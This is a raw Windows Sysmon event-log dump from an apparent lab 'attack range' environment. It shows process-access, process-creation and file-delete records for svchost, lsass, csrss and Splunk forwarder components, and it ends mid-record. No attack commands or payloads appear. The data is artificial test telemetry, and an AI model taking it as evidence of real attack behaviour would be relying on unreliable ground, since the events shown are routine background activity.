10:43:45.709{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0FE1-6216-2704-000000003902}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FE1-6216-2704-000000003902}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.710{4F8D34B0-0FE1-6216-2704-000000003902}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000215389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.428{4F8D34B0-0FE1-6216-2604-000000003902}34123068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.334{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17F20149042EFAFA70395085B4436C20,SHA256=F4B0996CF2D4E60D445EF40FF91172FE27C173B563D9728C2CEE3162404CF414,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:45.560{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:45.560{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:45.560{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:45.091{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDDE47A1556AFEFA76696F25EB22D703,SHA256=A312A7A14437A1295B408E269D1B0F259944F9F244CF866F47BE183A08C5308C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FE1-6216-2604-000000003902}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0FE1-6216-2604-000000003902}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.194{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FE1-6216-2604-000000003902}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 